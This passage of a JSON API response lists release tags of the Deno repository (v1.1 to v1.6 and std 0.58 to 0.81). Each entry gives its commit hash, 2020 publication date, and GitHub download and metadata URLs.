pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T1